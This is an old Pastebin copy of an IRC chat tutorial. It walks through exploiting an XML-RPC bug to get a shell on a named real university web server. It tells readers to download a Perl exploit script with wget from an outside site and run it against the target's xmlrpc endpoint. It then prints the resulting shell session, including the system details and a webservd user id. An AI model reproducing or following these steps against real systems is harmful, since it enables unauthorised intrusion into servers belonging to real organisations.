SHARE
TWEET

How to exploit a site with XML bug?

sql Jul 5th, 2011 7,141 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. irc.anonops.li - #bhlynx - #tutorials - sql
  2.  
  3. How to exploit a site with XML bug?
  4.  
  5. <&sql> First of all you need to have installed perl on ur OS, if you don't have use activeperl for windows, if u re using linux it's a better thing
  6. <&sql> after it
  7. <&sql> download this source code to ur pc
  8. <&sql> wget http://theinvite.info/stuff/sqlxml.txt
  9. <&sql> if u re using linux then use wget :)
  10. <&sql> on win do it manually copy/paste to sqlxml.txt
  11. <&sql> now lets go on
  12. <&sql> to the funniest thing
  13. <&sql> search ur sqlml.txt throught ur activeperl promt
  14. <&sql> or linux console
  15. <&sql> cd whatever
  16. <&sql> now
  17. <&sql> put this command when you have found it
  18. <&sql> perl sqlxml.txt http://www.luiss.it/siti//nucleus/xmlrpc/server.php
  19. <&sql> after that, try this command
  20. <&sql> uname -a; id
  21. <&sql> sql-shell@#uname -a;id
  22. <&sql> SunOS marte 5.10 Generic_138888-08 sun4u sparc SUNW,Sun-Fire-V245
  23. <&sql> uid=80(webservd) gid=80(webservd)                                
  24. <&sql> sql-shell@#who -r
  25. <&sql>    .       run-level 3  set 13 08:20     3      0  S
  26. <&sql> sql-shell@#date; logname
  27. <&sql> martedì  5 luglio 2011 13:53:33 CEST
  28. <&sql> welcome u re in luiss.it
  29. <&sql> that re the basic things how to get into hosts which have a vun. bug in xml.
  30. <&sql> :)
RAW Paste Data
Top